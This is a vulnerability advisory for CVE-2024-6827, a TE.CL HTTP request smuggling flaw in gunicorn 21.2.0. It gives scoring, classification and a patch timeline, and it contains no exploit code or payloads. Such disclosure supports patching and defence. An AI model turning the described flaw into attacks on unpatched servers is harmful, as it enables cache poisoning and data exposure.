CVE-2024-6827: HTTP Request Smuggling in benoitc/gunicorn

7.5 CVSS

Description

Gunicorn version 21.2.0 does not properly validate the value of the 'Transfer-Encoding' header as specified in the RFC standards, which leads to the default fallback method of 'Content-Length,' making it vulnerable to TE.CL request smuggling. This vulnerability can lead to cache poisoning, data exposure, session manipulation, SSRF, XSS, DoS, data integrity compromise, security bypass, information leakage, and business logic abuse.

Classification

CVE ID: CVE-2024-6827

CVSS Base Severity: HIGH

CVSS Base Score: 7.5

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Problem Types

CWE-444 Inconsistent Interpretation of HTTP Requests

Affected Products

Vendor: benoitc

Product: benoitc/gunicorn

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.05% (probability of being exploited)

EPSS Percentile: 10.92% (scored less or equal to compared to others)

EPSS Date: 2025-04-05 (when was this score calculated)

Timeline

2025-03-20 11:40:31 UTC
CVE

HTTP Request Smuggling in benoitc/gunicorn
2025-03-26 17:15:30 UTC
Tenable Plugins

SUSE SLED15 / SLES15 / openSUSE 15 Security Update : python-gunicorn (SUSE-SU-2025:1008-1)
2025-03-26 17:15:30 UTC
Tenable Plugins

SUSE SLES15 Security Update : python-gunicorn (SUSE-SU-2025:1002-1)